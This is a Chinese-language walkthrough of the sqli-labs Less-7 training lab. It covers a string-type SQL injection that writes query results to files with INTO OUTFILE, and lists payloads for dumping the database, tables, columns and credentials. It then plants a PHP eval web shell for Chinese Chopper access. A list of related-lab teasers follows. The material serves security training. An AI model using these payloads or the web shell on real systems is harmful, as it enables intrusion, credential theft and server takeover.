7.sqli-labs-Less7
Less 7 GET-Dump into outfile-String
1、根据提示:是把字段值写入一个可以输出的文本+字符串类型注入
①、找闭合类型(看源码)
②、查看目录结构(使用第一关的@@basedir或者@@datadir,或者直接看靶机吧)
2、一直回显查You are in… Use outfile…,很难找出闭合类型;
①看Less7的index.php下的源码:SELECT * FROM users WHERE id=((’$id’)) LIMIT 0,1
//闭合手法’))
3、查看靶机目录:/var/www/html/sqlilabs/Less-7
①ls -l
drwxr-xr-x. 2 root root 4096 3月 29 13:18 Less-7
//注意该目录的所有者不是mysql,而是root,我们需要把其他人的写入权限加上才能写进文件
②chmod o+w Less-7
③ls -l
drwxr-xrwx. 2 root root 4096 3月 29 13:18 Less-7
4、构造payload
?id=1’)) union select 1,2,3 into outfile “/var/www/html/sqilabs/Less-7/test1.txt”%23
5、浏览器访问该文件,没有
//发现靶机报错result.txt
1’)) union select 1,2,3 into outfile “/var/www/html/sqilabs/Less-7/test1.txt” #
6、此处我们需要在/etc/my.cnf里面的[mysql]下加一条语句: secure_file_priv="/"
注意:我们可以通过secure_file_priv 来完成对导入|导出的限制
secure_file_priv1、限制mysqld 不允许导入 | 导出secure_file_prive=null2、限制mysqld 的导入 | 导出 只能发生在/tmp/目录下secure_file_priv=/tmp/3、不对mysqld 的导入 | 导出做限制secure_file_priv=" "(没有用,瞎搞。。。)4、导出到任意目录secure_file_priv="/"(亲测,可以)
7、再次执行:
测试:
?id=1’)) union select 1,2,3 into outfile “/var/www/html/sqlilabs/Less-7/test1.txt”%23
//浏览器访问:http://192.168.97.142/sqlilabs/Less-7/test1.txt
爆库:
?id=1’)) union select database(),version(),user() into outfile “/var/www/html/sqlilabs/Less-7/database.txt”%23
爆表:
?id=1’)) union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=‘security’),3 into outfile “/var/www/html/sqlilabs/Less-7/table.txt”%23
爆字段:
?id=1’)) union select 1,(select group_concat(column_name) from information_schema.columns where table_name=‘users’),3 into outfile “/var/www/html/sqlilabs/Less-7/column.txt”%23
爆字段值:
?id=1’)) union select 1,(select group_concat(concat_ws(char(32,58,32),username,password)) from users),3 into outfile “/var/www/html/sqlilabs/Less-7/dump.txt”%23
8、上传一个Webshell,菜刀连接
?id=1’)) union select 1,"<?php @eval($_POST['123']);?>",3 into outfile “/var/www/html/sqlilabs/Less-7/1.php”%23
//注意一句话木马里面的单引号于外面的双引号是区别,不能一样,否则不成功;
菜刀连接:http://192.168.97.142/sqlilabs/Less-7/1.php(密码123)
7.sqli-labs-Less7相关推荐
- SQLi LABS Less-7 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第七关是单引号+双括号的字符型注入,推荐使用布尔盲注. 方式一:布尔盲注 第一 ...
- SQLi LABS Less 27a 联合注入+布尔盲注+时间盲注
第27a关是双引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.布尔盲注.时间盲注三种解题方式. 其他 SQLi LABS 靶场的解题步 ...
- SQLi LABS Less 27 联合注入+报错注入+布尔盲注+时间盲注
第27关是单引号字符型注入: 过滤了注释(/* -- #),关键字(select union),空格: 这篇文章提供联合注入.报错注入.布尔盲注.时间盲注四种解题方式. 其他 SQLi LABS 靶场 ...
- SQLi LABS Less 26a 联合注入+布尔盲注
第26a关是单引号+括号的字符型注入: 后台过滤了关键字( and or ),注释(/* # -- /),空格: 这篇文章提供联合注入.布尔盲注.两种解题方式. SQLi LABS其他关卡可以 ...
- SQLi LABS Less 25 联合注入+报错注入+布尔盲注
第二十五关单引号字符型注入: 过滤了关键字(and.or),可以使用双写绕过: 这篇文章提供了联合注入.报错注入.布尔盲注三种解题方法. SQLi LABS 其余关卡可参考我的专栏:SQLi-LABS ...
- sqli——labs初学者通关详
目录 Less-1 GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) Less-2 GET-Error based- Intiger bas ...
- SQLi LABS Less-8 布尔盲注
「作者主页」:士别三日wyx 「作者简介」:CSDN top200.阿里云博客专家.华为云享专家.网络安全领域优质创作者 第八关是单引号字符型注入,推荐使用布尔盲注 方式一:布尔盲注 第一步.判断注入 ...
- SQLi LABS Less-31
第31关的源码中并未对参数做过多的过滤,只是在参数两边拼接了双引号和括号 在url地址栏中输入 1") and true-- a,使SQL恒成立,页面正常显示 再输入 1") an ...
- SQLi LABS Less-30
第30关使用GET请求传递参数,在url中构造payload即可 后端源码中并没有做什么过滤,只是在参数两边添加了双引号 输入 1" and true-- a,页面正常显示 输入 1&quo ...
- SQLi LABS Less-29
第29关使用GET请求提交参数,在url中构造payload即可 源码中并没有做什么过滤,直接测试注入点即可 在url中输入 1'and true-- a,源码中的SQL会拼接成下面这样 注释后面的内 ...
最新文章
- 计算机专业报专转本可以志愿,2019年专转本志愿怎么填?专家透露报考窍门
- docker pull的镜像放在哪里_Docker 安装ELK及Docker常见命令
- Attachment rename issue in Faas
- linux6 epel yum源,CentOS6下yum源与epel源配置
- python神经网络训练_Python深度学习训练神经网络
- webpack 多入口打包配置示例
- 机器学习基石01:机器学习简介
- 多媒体知识,手机电脑设备联用
- 易语言 查询API之文本和字体函数
- C语言加法测试题,c语言50练习题.doc
- java神兽传说游戏,了不起的神兽传说
- 把基础打牢了,将来就可以触类旁通,行行都可以写出精彩
- 如何在outlook里面撤回邮件?邮件撤回成功后对方还能不能看到?
- 影视寒冬,但却可能是广告主营销的机遇
- 解决自己的小问题sizeof(ages) / sizeof(ages[0])是干嘛的
- maven-之Lifecycle详解
- 电大java语言程序设计_国家开放大学电大Java语言程序设计形考任务1答案
- 骚操作!代码写情诗 | 程序员有话说
- neo4j的使用(以红楼梦人物关系为例)
- 一、图的定义,邻接矩阵和邻接表的实现